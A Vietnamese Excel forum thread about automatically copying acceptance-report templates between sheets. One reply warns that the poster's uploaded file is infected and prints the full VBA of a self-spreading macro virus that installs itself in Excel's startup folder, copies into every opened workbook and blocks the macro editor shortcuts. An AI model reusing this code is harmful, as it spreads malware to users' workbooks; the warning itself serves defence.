Tự động chép 1 vùng dữ liệu (2 người xem)

Liên hệ QC

Người dùng đang xem chủ đề này

thientuan_dhxd

Thành viên mới
Tham gia
2/6/13
Bài viết
5
Được thích
0
Tôi thường xuyên phải làm việc với các biên bản nghiệm thu, số lượng BBNT rất lớn. Vấn đề là tôi muốn khi có thêm 1 công việc cần nghiệm thu ở Sheet "CV" thì bên Sheet "BBNT" tự coppy biên bản ngay trên xuống dưới.
(Ví dụ khi Sheet CV có BBNT số 2 thì Sheet BBNT tự động coppy BBNT số 1 xuống dưới để có BBNT số 2)
 
Tôi thường xuyên phải làm việc với các biên bản nghiệm thu, số lượng BBNT rất lớn. Vấn đề là tôi muốn khi có thêm 1 công việc cần nghiệm thu ở Sheet "CV" thì bên Sheet "BBNT" tự coppy biên bản ngay trên xuống dưới.
(Ví dụ khi Sheet CV có BBNT số 2 thì Sheet BBNT tự động coppy BBNT số 1 xuống dưới để có BBNT số 2)
Đọc xong tôi nghĩ là bạn tự nói với mình hay sao ấy.
Chẳng hiểu gì và cũng chẳng thấy gì để hiểu.
 
Tôi thường xuyên phải làm việc với các biên bản nghiệm thu, số lượng BBNT rất lớn. Vấn đề là tôi muốn khi có thêm 1 công việc cần nghiệm thu ở Sheet "CV" thì bên Sheet "BBNT" tự coppy biên bản ngay trên xuống dưới.
(Ví dụ khi Sheet CV có BBNT số 2 thì Sheet BBNT tự động coppy BBNT số 1 xuống dưới để có BBNT số 2)

Bạn nêu ý không rõ ràng thì chẳng ai giúp bạn được đâu?
Ví dụ:
- Công việc cần nghiệm thu ở Sheet "CV" là công việc nào? nó ở vùng nào? không có địa chỉ rõ ràng thì không biết thì làm sao mà thực hiện được.
- Khi nêu câu hỏi thì nên tải lên 1 File thì mọi người giúp bạn sẽ dễ dàng hơn, nếu không có File thì ai có thì giờ rảnh ngồi gõ từng cái nội dung trong từng câu hỏi để giúp bạn.
- Sheet "BBNT" tự coppy biên bản xuống dưới thì xuống chỗ nào, cách biên bản trước bao nhiêu dòng.

Nói thêm: Theo cách bạn nêu ở câu hỏi thì ý bạn muốn lưu từng biên bản nghiệm thu, nếu đúng vậy thì tôi nghĩ bạn nên sử dụng Mail Merge để tạo biên bản trong Word và lưu mỗi biên bản 1 File chứa trong 1 thư mục nào đó, sau đó tìm đọc bài tự động tạo Link đến các File có trong thư mục để mở nó để tải File về sử dụng, nếu bạn chưa biết sử dụng Mail Merge như thế nào thì bạn nên tìm nội dung hướng dẫn về sử dụng Mail Merge để biết mà thực hiện.
 
Lần chỉnh sửa cuối:
Xin lỗi các bạn, hôm qua không hiểu sao máy không upload được File lên.
Các bạn xem giúp mình với nhé
 
Xin lỗi các bạn, hôm qua không hiểu sao máy không upload được File lên.
Các bạn xem giúp mình với nhé
Cảnh báo Virus:
Trong file bạn có mấy cái này, bạn nào mở file coi chừng "dính":
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub

Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close
End If
Next
End Sub

Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!ycop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
 
Xin lỗi các bạn, hôm qua không hiểu sao máy không upload được File lên.
Các bạn xem giúp mình với nhé
Bạn dùng tạm cái này đúng như ý bạn không nhé
Kiểu dữ liệu bạn đưa nhậy thế nào khi áp dụng cũng sẽ hỏi tiếp (mình đoán vậy thôi)
 

File đính kèm

Cảm ơn bạn, phần copy thì ok rồi
Nhưng nếu như sheet CV các số ở cột A không được đánh liên tục như trong File bạn sửa (giả sử bỏ số 2 và 3 thì số lượng bản copy vẫn =4 = tổng số dòng cột A có giá trị)
Ý mình là chỉ khi nào các ô ở cột A có giá trị (số hoặc chữ) thì mới cần copy biên bản xuống
(Tiện đây, bạn giúp mình sửa lại nếu số biên bản bắt đầu từ ô B5 - không phải từ A1 xuống, và vùng cần copy là A1:BJ40 thì làm thế nào)
 
Cảm ơn bạn, phần copy thì ok rồi
Nhưng nếu như sheet CV các số ở cột A không được đánh liên tục như trong File bạn sửa (giả sử bỏ số 2 và 3 thì số lượng bản copy vẫn =4 = tổng số dòng cột A có giá trị)
Ý mình là chỉ khi nào các ô ở cột A có giá trị (số hoặc chữ) thì mới cần copy biên bản xuống
(Tiện đây, bạn giúp mình sửa lại nếu số biên bản bắt đầu từ ô B5 - không phải từ A1 xuống, và vùng cần copy là A1:BJ40 thì làm thế nào)
Mình thừa sức biết cái đó, nhưng do bạn không đưa dữ liệu cụ thể nên tôi nghĩ bạn cần cái copy mà thôi, còn số biên bản đâu phải đơn giản vậy? Biết đâu có thêm số biên bản không phải là số thứ tự đôi khi số BB là 15a, 15b nữa thì sao?. Như mình nói ở trên tốt nhất bạn đưa mẫu biên bản của bạn có dữ liệu tương đối thì sẽ có kết quả tốt hơn, còn không thì cứ hỏi mãi. Mình sẽ giúp bạn luôn thể, khỏi mất nhiều thời gian cho cả 2
Bạn tham khảo thêm Link này tương tự như yêu cầu của bạn
 
Web KT

Bài viết mới nhất

Back
Top Bottom